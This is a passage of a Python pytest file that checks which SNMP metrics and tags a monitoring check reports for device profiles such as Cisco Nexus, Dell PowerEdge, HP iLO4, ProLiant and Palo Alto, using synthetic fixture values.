for metric in IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for metric in IF_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for metric in IF_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1)
for metric in IP_COUNTS + IPX_COUNTS:
tags = common_tags + ['ipversion:ipv6']
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1)
for metric in TCP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
for metric in TCP_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in UDP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
sensors = [1006, 1007, 1008, 2006, 2007, 2008]
for sensor in sensors:
tags = ['sensor_id:{}'.format(sensor), 'sensor_type:8'] + common_tags
aggregator.assert_metric('snmp.entSensorValue', metric_type=aggregator.GAUGE, tags=tags, count=1)
frus = [1001, 1010, 2001, 2010]
for fru in frus:
tags = ['fru:{}'.format(fru)] + common_tags
for metric in FRU_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
cpus = [1000, 2000]
for cpu in cpus:
tags = ['cpu:{}'.format(cpu)] + common_tags
for metric in CPU_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for interface in interfaces:
tags = ['interface:{}'.format(interface)] + common_tags
for metric in CIE_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
aggregator.assert_metric('snmp.cieIfResetCount', metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1)
for source in range(1, 3):
env_tags = ['power_source:{}'.format(source)]
aggregator.assert_metric(
'snmp.ciscoEnvMonSupplyState', metric_type=aggregator.GAUGE, tags=env_tags + common_tags
)
aggregator.assert_metric(
'snmp.ciscoEnvMonFanState', metric_type=aggregator.GAUGE, tags=common_tags,
)
aggregator.assert_metric('snmp.cswStackPortOperStatus', metric_type=aggregator.GAUGE)
for switch, mac_addr in [(1, '0x046c9d42b080'), (2, '0xdccec1430680')]:
tags = ['entity_name:Switch {}'.format(switch), 'mac_addr:{}'.format(mac_addr)] + common_tags
aggregator.assert_metric('snmp.cswSwitchState', metric_type=aggregator.GAUGE, tags=tags)
frus = [1011, 1012, 1013, 2011, 2012, 2013]
for fru in frus:
tags = ['fru:{}'.format(fru)] + common_tags
aggregator.assert_metric(
'snmp.cefcFanTrayOperStatus', metric_type=aggregator.GAUGE, tags=['fru:{}'.format(fru)] + common_tags
)
for metrics in MEMORY_METRICS:
for pool in ['Processor', 'IOS Process stack']:
tags = ['mem_pool_name:{}'.format(pool)] + common_tags
aggregator.assert_metric('snmp.{}'.format(metrics), metric_type=aggregator.GAUGE, tags=tags)
neighbor_metrics = [
('ospfNbrEvents', aggregator.RATE),
('ospfNbrState', aggregator.GAUGE),
('ospfNbrLsRetransQLen', aggregator.GAUGE),
]
for metric, metric_type in neighbor_metrics:
tags = ['neighbor_ip:192.29.116.26', 'neighbor_id:192.29.66.79'] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=metric_type, tags=tags, count=1)
lls_metrics = ['ospfIfRetransInterval', 'ospfIfState']
for metric in lls_metrics:
tags = ['ospf_ip_addr:192.29.116.25'] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for temp_index in [1006, 1007, 1008, 2006, 2007, 2008]:
env_tag = ['temp_index:{}'.format(temp_index), 'temp_state:1']
aggregator.assert_metric(
'snmp.ciscoEnvMonTemperatureStatusValue', metric_type=aggregator.GAUGE, tags=env_tag + common_tags
)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_meraki_cloud_controller(aggregator):
run_profile_check('meraki-cloud-controller')
common_tags = common.CHECK_TAGS + ['snmp_profile:meraki-cloud-controller', 'snmp_host:dashboard.meraki.com']
common.assert_common_metrics(aggregator, common_tags)
dev_metrics = ['devStatus', 'devClientCount']
dev_tags = ['device:Gymnasium', 'product:MR16-HW', 'network:L_NETWORK'] + common_tags
for metric in dev_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=dev_tags, count=1)
if_tags = ['interface:wifi0', 'index:4'] + common_tags
if_metrics = ['devInterfaceSentPkts', 'devInterfaceRecvPkts', 'devInterfaceSentBytes', 'devInterfaceRecvBytes']
for metric in if_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=if_tags, count=1)
# IF-MIB
if_tags = ['interface:eth0'] + common_tags
for metric in IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=if_tags, count=1
)
for metric in IF_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=if_tags, count=1)
for metric in IF_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=if_tags, count=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_idrac(aggregator):
run_profile_check('idrac')
interfaces = ['eth0', 'en1']
common_tags = common.CHECK_TAGS + ['snmp_profile:idrac']
common.assert_common_metrics(aggregator, common_tags)
for interface in interfaces:
tags = ['adapter:{}'.format(interface)] + common_tags
for count in ADAPTER_IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(count), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
indexes = ['26', '29']
for index in indexes:
tags = ['chassis_index:{}'.format(index)] + common_tags
for gauge in SYSTEM_STATUS_GAUGES:
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1)
powers = ['supply1', 'supply2']
for power in powers:
tags = ['supply_name:{}'.format(power)] + common_tags
aggregator.assert_metric('snmp.enclosurePowerSupplyState', metric_type=aggregator.GAUGE, tags=tags, count=1)
disks = ['disk1', 'disk2']
for disk in disks:
tags = ['disk_name:{}'.format(disk)] + common_tags
for gauge in DISK_GAUGES:
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1)
batteries = ['battery1', 'battery2']
for battery_name in batteries:
tags = ['battery_name:{}'.format(battery_name)] + common_tags
aggregator.assert_metric('snmp.{}'.format("batteryState"), metric_type=aggregator.GAUGE, tags=tags, count=1)
controllers = ['controller1', 'controller2']
for controller in controllers:
tags = ['controller_name:{}'.format(controller)] + common_tags
aggregator.assert_metric(
'snmp.{}'.format("controllerRollUpStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1
)
devices = ['device1', 'device2']
indexes = ['10', '20']
for device, index in zip(devices, indexes):
tags = ['device_descr_name:{}'.format(device), 'chassis_index:{}'.format(index)] + common_tags
aggregator.assert_metric('snmp.{}'.format("pCIDeviceStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1)
slots = ['slot1', 'slot2']
indexes = ['19', '21']
for slot, index in zip(slots, indexes):
tags = ['slot_name:{}'.format(slot), 'chassis_index:{}'.format(index)] + common_tags
aggregator.assert_metric('snmp.{}'.format("systemSlotStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1)
tag_mappings = [('29', 'device2', '0x9e00e0291401'), ('3', 'device1', '0x9e00e0291401')]
for index, device, mac in tag_mappings:
tags = [
'chassis_index:{}'.format(index),
'device_fqdd:{}'.format(device),
'mac_addr:{}'.format(mac),
] + common_tags
aggregator.assert_metric(
'snmp.{}'.format("networkDeviceStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1
)
indexes = ['3', '31']
for index in indexes:
tags = ['chassis_index:{}'.format(index)] + common_tags
aggregator.assert_metric('snmp.{}'.format("systemBIOSStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1)
indexes = ['9', '18']
probe_types = ['26', '26']
for index, probe_type in zip(indexes, probe_types):
tags = ['chassis_index:{}'.format(index), 'probe_type:{}'.format(probe_type)] + common_tags
for gauge in PROBE_GAUGES:
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1)
indexes = ['12', '22']
probe_types = ['6', '3']
for index, probe_type in zip(indexes, probe_types):
tags = ['chassis_index:{}'.format(index), 'probe_type:{}'.format(probe_type)] + common_tags
for gauge in VOLTAGE_GAUGES:
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1)
indexes = ['29', '22']
device_types = ['26', '4']
for index, device_type in zip(indexes, device_types):
tags = ['chassis_index:{}'.format(index), 'device_type:{}'.format(device_type)] + common_tags
aggregator.assert_metric(
'snmp.{}'.format("memoryDeviceStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1
)
for gauge in DRS_GAUGES:
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_cisco_nexus(aggregator):
run_profile_check('cisco_nexus')
interfaces = ["GigabitEthernet1/0/{}".format(i) for i in range(1, 9)]
common_tags = common.CHECK_TAGS + ['snmp_host:Nexus-eu1.companyname.managed', 'snmp_profile:cisco-nexus']
common.assert_common_metrics(aggregator, common_tags)
for interface in interfaces:
tags = ['interface:{}'.format(interface)] + common_tags
aggregator.assert_metric('snmp.cieIfResetCount', metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1)
for interface in interfaces:
tags = ['interface:{}'.format(interface)] + common_tags
for metric in IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for metric in IF_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1)
for metric in IF_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for metric in TCP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
for metric in TCP_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in UDP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
sensors = [1, 9, 11, 12, 12, 14, 17, 26, 29, 31]
for sensor in sensors:
tags = ['sensor_id:{}'.format(sensor), 'sensor_type:8'] + common_tags
aggregator.assert_metric('snmp.entSensorValue', metric_type=aggregator.GAUGE, tags=tags, count=1)
frus = [6, 7, 15, 16, 19, 27, 30, 31]
for fru in frus:
tags = ['fru:{}'.format(fru)] + common_tags
for metric in FRU_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
cpus = [3173, 6692, 11571, 19529, 30674, 38253, 52063, 54474, 55946, 63960]
for cpu in cpus:
tags = ['cpu:{}'.format(cpu)] + common_tags
for metric in CPU_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for (index, state) in [(3, 3), (6, 6), (8, 6), (11, 6), (13, 3), (14, 6), (20, 6), (21, 4), (31, 5)]:
aggregator.assert_metric(
'snmp.ciscoEnvMonTemperatureStatusValue',
metric_type=aggregator.GAUGE,
tags=['temp_state:{}'.format(state), 'temp_index:{}'.format(index)] + common_tags,
)
aggregator.assert_metric(
'snmp.ciscoEnvMonSupplyState', metric_type=aggregator.GAUGE, tags=['power_source:1'] + common_tags,
)
fan_indices = [4, 6, 7, 16, 21, 22, 25, 27]
for index in fan_indices:
tags = ['fan_status_index:{}'.format(index)] + common_tags
aggregator.assert_metric(
'snmp.ciscoEnvMonFanState', metric_type=aggregator.GAUGE, tags=tags,
)
aggregator.assert_metric('snmp.cswStackPortOperStatus', metric_type=aggregator.GAUGE)
aggregator.assert_metric(
'snmp.cswSwitchState', metric_type=aggregator.GAUGE, tags=['mac_addr:0xffffffffffff'] + common_tags
)
frus = [2, 7, 8, 21, 26, 27, 30, 31]
for fru in frus:
tags = ['fru:{}'.format(fru)] + common_tags
aggregator.assert_metric(
'snmp.cefcFanTrayOperStatus', metric_type=aggregator.GAUGE, tags=['fru:{}'.format(fru)] + common_tags
)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_dell_poweredge(aggregator):
run_profile_check('dell-poweredge')
# Poweredge
sys_mem_gauges = [
'operatingSystemMemoryAvailablePhysicalSize',
'operatingSystemMemoryTotalPageFileSize',
'operatingSystemMemoryAvailablePageFileSize',
'operatingSystemMemoryTotalVirtualSize',
'operatingSystemMemoryAvailableVirtualSize',
]
power_supply_gauges = [
'powerSupplyStatus',
'powerSupplyOutputWatts',
'powerSupplyMaximumInputVoltage',
'powerSupplyCurrentInputVoltage',
]
temperature_probe_gauges = ['temperatureProbeStatus', 'temperatureProbeReading']
processor_device_gauges = ['processorDeviceStatus', 'processorDeviceThreadCount']
cache_device_gauges = ['cacheDeviceStatus', 'cacheDeviceMaximumSize', 'cacheDeviceCurrentSize']
memory_device_gauges = ['memoryDeviceStatus', 'memoryDeviceFailureModes']
idrac_gauges = (
['batteryState', 'controllerRollUpStatus', 'pCIDeviceStatus', 'systemSlotStatus', 'systemBIOSStatus']
+ VOLTAGE_GAUGES
+ PROBE_GAUGES
)
common_tags = common.CHECK_TAGS + ['snmp_profile:dell-poweredge']
common.assert_common_metrics(aggregator, common_tags)
chassis_indexes = [29, 31]
for chassis_index in chassis_indexes:
tags = ['chassis_index:{}'.format(chassis_index)] + common_tags
for metric in sys_mem_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1)
indexes = [5, 17]
for index in indexes:
tags = ['chassis_index:4', 'index:{}'.format(index)] + common_tags
for metric in power_supply_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1)
indexes = [13]
for index in indexes:
tags = ['chassis_index:18', 'index:{}'.format(index)] + common_tags
for metric in temperature_probe_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1)
indexes = [17, 28]
for index in indexes:
tags = ['chassis_index:5', 'index:{}'.format(index)] + common_tags
for metric in processor_device_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1)
indexes = [15, 27]
for index in indexes:
tags = ['chassis_index:11', 'index:{}'.format(index)] + common_tags
for metric in cache_device_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1)
serial_numbers = ['forward zombies acted Jaded', 'kept oxen their their oxen oxen']
for serial_number in serial_numbers:
tags = ['serial_number_name:{}'.format(serial_number), 'chassis_index:1'] + common_tags
for metric in memory_device_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1)
ip_addresses = ['66.97.1.103', '62.148.76.32', '45.3.243.155']
for ip_address in ip_addresses:
tags = ['ip_address:{}'.format(ip_address)] + common_tags
aggregator.assert_metric('snmp.networkDeviceStatus', metric_type=aggregator.GAUGE, tags=tags, at_least=1)
# Intel Adapter
interfaces = ['eth0', 'en1']
for interface in interfaces:
tags = ['adapter:{}'.format(interface)] + common_tags
for count in ADAPTER_IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(count), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
# IDRAC
indexes = ['26', '29']
for index in indexes:
tags = ['chassis_index:{}'.format(index)] + common_tags
for gauge in SYSTEM_STATUS_GAUGES:
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1)
powers = ['supply1', 'supply2']
for power in powers:
tags = ['supply_name:{}'.format(power)] + common_tags
aggregator.assert_metric('snmp.enclosurePowerSupplyState', metric_type=aggregator.GAUGE, tags=tags, count=1)
disks = ['disk1', 'disk2']
for disk in disks:
tags = ['disk_name:{}'.format(disk)] + common_tags
for gauge in DISK_GAUGES:
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1)
for gauge in idrac_gauges:
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_hp_ilo4(aggregator):
run_profile_check('hp_ilo4')
status_gauges = [
'cpqHeCritLogCondition',
'cpqHeCorrMemLogStatus',
'cpqHeCorrMemLogCondition',
'cpqHeAsrStatus',
'cpqHeAsrPost',
'cpqHeAsrCondition',
'cpqHeAsrNetworkAccessStatus',
'cpqHeThermalCondition',
'cpqHeThermalTempStatus',
'cpqHeThermalSystemFanStatus',
'cpqHeThermalCpuFanStatus',
'cpqNicVtVirusActivity',
'cpqSm2CntlrServerPowerState',
'cpqSm2CntlrBatteryStatus',
'cpqSm2CntlrRemoteSessionStatus',
'cpqSm2CntlrInterfaceStatus',
]
cpqhlth_counts = ['cpqHeAsrRebootCount', 'cpqHeCorrMemTotalErrs']
cpqhlth_gauges = ['cpqHeSysUtilEisaBusMin', 'cpqHePowerMeterCurrReading', 'cpqHeSysUtilLifeTime']
cpqsm2_gauges = [
'cpqSm2CntlrBatteryPercentCharged',
'cpqSm2CntlrSelfTestErrors',
'cpqSm2EventTotalEntries',
]
EMBEDDED = 2
PCMCIA = 3
card_locations = [EMBEDDED, PCMCIA]
network_card_counts = [
'cpqSm2NicXmitBytes',
'cpqSm2NicXmitTotalPackets',
'cpqSm2NicXmitDiscardPackets',
'cpqSm2NicXmitErrorPackets',
'cpqSm2NicXmitQueueLength',
'cpqSm2NicRecvBytes',
'cpqSm2NicRecvTotalPackets',
'cpqSm2NicRecvDiscardPackets',
'cpqSm2NicRecvErrorPackets',
'cpqSm2NicRecvUnknownPackets',
]
interfaces = ['eth0', 'en1']
phys_adapter_counts = [
'cpqNicIfPhysAdapterGoodTransmits',
'cpqNicIfPhysAdapterGoodReceives',
'cpqNicIfPhysAdapterBadTransmits',
'cpqNicIfPhysAdapterBadReceives',
'cpqNicIfPhysAdapterInOctets',
'cpqNicIfPhysAdapterOutOctets',
]
phys_adapter_gauges = ['cpqNicIfPhysAdapterSpeed', 'cpqNicIfPhysAdapterSpeedMbps']
temperature_sensors = [1, 13, 28]
batteries = [1, 3, 4, 5]
common_tags = common.CHECK_TAGS + ['snmp_profile:hp-ilo4']
common.assert_common_metrics(aggregator, common_tags)
for metric in status_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in cpqhlth_counts:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
for metric in cpqhlth_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in cpqsm2_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for index in temperature_sensors:
tags = ['temperature_index:{}'.format(index)] + common_tags
aggregator.assert_metric('snmp.cpqHeTemperatureCelsius', metric_type=aggregator.GAUGE, tags=tags, count=1)
aggregator.assert_metric('snmp.cpqHeTemperatureCondition', metric_type=aggregator.GAUGE, tags=tags, count=1)
for index in batteries:
tags = ['battery_index:{}'.format(index)] + common_tags
aggregator.assert_metric('snmp.cpqHeSysBatteryCondition', metric_type=aggregator.GAUGE, tags=tags, count=1)
aggregator.assert_metric('snmp.cpqHeSysBatteryStatus', metric_type=aggregator.GAUGE, tags=tags, count=1)
for location in card_locations:
tags = ['nic_stats_location:{}'.format(location)] + common_tags
for metric in network_card_counts:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for interface in interfaces:
tags = ['interface:{}'.format(interface)] + common_tags
for metric in phys_adapter_counts:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for metric in phys_adapter_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_proliant(aggregator):
run_profile_check('hpe-proliant')
common_tags = common.CHECK_TAGS + ['snmp_profile:hpe-proliant']
common.assert_common_metrics(aggregator, common_tags)
for metric in TCP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
for metric in TCP_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in UDP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
cpu_gauges = [
"cpqSeCpuSlot",
"cpqSeCpuSpeed",
"cpqSeCpuStatus",
"cpqSeCpuExtSpeed",
"cpqSeCpuCore",
"cpqSeCPUCoreMaxThreads",
"cpqSeCpuPrimary",
]
cpu_indexes = [0, 4, 6, 8, 13, 15, 26, 27]
for idx in cpu_indexes:
tags = ['cpu_index:{}'.format(idx)] + common_tags
for metric in cpu_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
cpu_util_gauges = ["cpqHoCpuUtilMin", "cpqHoCpuUtilFiveMin", "cpqHoCpuUtilThirtyMin", "cpqHoCpuUtilHour"]
cpu_unit_idx = [4, 7, 13, 20, 22, 23, 29]
for idx in cpu_unit_idx:
tags = ['cpu_unit_index:{}'.format(idx)] + common_tags
for metric in cpu_util_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
file_sys_gauges = [
"cpqHoFileSysSpaceTotal",
"cpqHoFileSysSpaceUsed",
"cpqHoFileSysPercentSpaceUsed",
"cpqHoFileSysAllocUnitsTotal",
"cpqHoFileSysAllocUnitsUsed",
"cpqHoFileSysStatus",
]
file_sys_idx = [5, 8, 11, 15, 19, 21, 28, 30]
for idx in file_sys_idx:
tags = ['file_sys_index:{}'.format(idx)] + common_tags
for metric in file_sys_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
memory_gauges = [
"cpqSiMemModuleSize",
"cpqSiMemModuleType",
"cpqSiMemModuleSpeed",
"cpqSiMemModuleTechnology",
"cpqSiMemModuleECCStatus",
"cpqSiMemModuleFrequency",
"cpqSiMemModuleCellStatus",
]
memory_idx = [(6, 16), (7, 17), (7, 30), (8, 20), (10, 4), (15, 27), (20, 14), (21, 14), (23, 0), (28, 20)]
for board_idx, mem_module_index in memory_idx:
tags = ['mem_board_index:{}'.format(board_idx), "mem_module_index:{}".format(mem_module_index)] + common_tags
for metric in memory_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
drive_counts = [
"cpqDaPhyDrvUsedReallocs",
"cpqDaPhyDrvRefHours",
"cpqDaPhyDrvHardReadErrs",
"cpqDaPhyDrvRecvReadErrs",
"cpqDaPhyDrvHardWriteErrs",
"cpqDaPhyDrvRecvWriteErrs",
"cpqDaPhyDrvHSeekErrs",
"cpqDaPhyDrvSeekErrs",
]
drive_gauges = [
"cpqDaPhyDrvStatus",
"cpqDaPhyDrvFactReallocs",
"cpqDaPhyDrvSpinupTime",
"cpqDaPhyDrvSize",
"cpqDaPhyDrvSmartStatus",
"cpqDaPhyDrvCurrentTemperature",
]
drive_idx = [(0, 2), (0, 28), (8, 31), (9, 24), (9, 28), (10, 17), (11, 4), (12, 20), (18, 22), (23, 2)]
for drive_cntrl_idx, drive_index in drive_idx:
tags = ['drive_cntrl_idx:{}'.format(drive_cntrl_idx), "drive_index:{}".format(drive_index)] + common_tags
for metric in drive_counts:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for metric in drive_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for interface in ['eth0', 'eth1']:
if_tags = ['interface:{}'.format(interface)] + common_tags
for metric in IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=if_tags, count=1
)
for metric in IF_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=if_tags, count=1)
for metric in IF_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=if_tags, count=1)
mem_boards = ['11', '12']
for board in mem_boards:
tags = ['mem_board_index:{}'.format(board)] + common_tags
aggregator.assert_metric('snmp.cpqHeResMem2ModuleCondition', metric_type=aggregator.GAUGE, tags=tags, count=1)
adapter_gauges = ['cpqNicIfPhysAdapterStatus', 'cpqNicIfPhysAdapterState']
for gauge in adapter_gauges:
tags = ['adapter_name:adapter', 'adapter_mac_addr:mac'] + common_tags
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1)
power_metrics = [
'cpqHeFltTolPowerSupplyStatus',
'cpqHeFltTolPowerSupplyCapacityUsed',
'cpqHeFltTolPowerSupplyCapacityMaximum',
]
for gauge in power_metrics:
tags = ['chassis_num:30'] + common_tags
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1)
controller_index = ['controller_index:3'] + common_tags
aggregator.assert_metric(
'snmp.{}'.format("cpqDaCntlrCondition"), metric_type=aggregator.GAUGE, tags=controller_index, count=1
)
thermal_metrics = ['cpqHeThermalCondition', 'cpqHeSysUtilLifeTime', 'cpqHeFltTolPwrSupplyStatus']
for metric in thermal_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_generic_host_resources(aggregator):
instance = common.generate_instance_config([])
instance['community_string'] = 'generic_host'
instance['enforce_mib_constraints'] = False
instance['profile'] = 'generic'
init_config = {'profiles': {'generic': {'definition_file': '_generic-host-resources.yaml'}}}
check = SnmpCheck('snmp', init_config, [instance])
check.check(instance)
common_tags = common.CHECK_TAGS + ['snmp_profile:generic']
common.assert_common_metrics(aggregator, common_tags)
sys_metrics = [
'snmp.hrSystemUptime',
'snmp.hrSystemNumUsers',
'snmp.hrSystemProcesses',
'snmp.hrSystemMaxProcesses',
]
for metric in sys_metrics:
aggregator.assert_metric(metric, metric_type=aggregator.GAUGE, tags=common_tags, count=1)
aggregator.assert_metric('snmp.hrStorageAllocationUnits', count=2)
aggregator.assert_metric('snmp.hrStorageSize', count=2)
aggregator.assert_metric('snmp.hrStorageUsed', count=2)
aggregator.assert_metric('snmp.hrStorageAllocationFailures', count=2)
aggregator.assert_metric('snmp.hrProcessorLoad', count=2)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_palo_alto(aggregator):
run_profile_check('pan-common')
common_tags = common.CHECK_TAGS + ['snmp_profile:palo-alto']
common.assert_common_metrics(aggregator, common_tags)
session = [
'panSessionUtilization',
'panSessionMax',
'panSessionActive',
'panSessionActiveTcp',
'panSessionActiveUdp',
'panSessionActiveICMP',
'panSessionActiveSslProxy',
'panSessionSslProxyUtilization',
]
global_protect = [
'panGPGWUtilizationPct',
'panGPGWUtilizationMaxTunnels',
'panGPGWUtilizationActiveTunnels',
]
entity = [
'panEntityTotalPowerAvail',
'panEntityTotalPowerUsed',
]
entry = ['panEntryFRUModulePowerUsed', 'panEntryFRUModuleNumPorts']
for metric in session:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in global_protect:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in entity:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in entry:
# Needs cross table entPhysicalIsFRU tag
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags)
# Needs cross table entLogicalDescr tag
aggregator.assert_metric('snmp.panEntryFanTrayPowerUsed', metric_type=aggregator.GAUGE, tags=common_tags)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_cisco_asa_5525(aggregator):
run_profile_check('cisco_asa_5525')
common_tags = common.CHECK_TAGS + ['snmp_profile:cisco-asa-5525', 'snmp_host:kept']
common.assert_common_metrics(aggregator, common_tags)
for metric in TCP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
for metric in TCP_GAUGES:
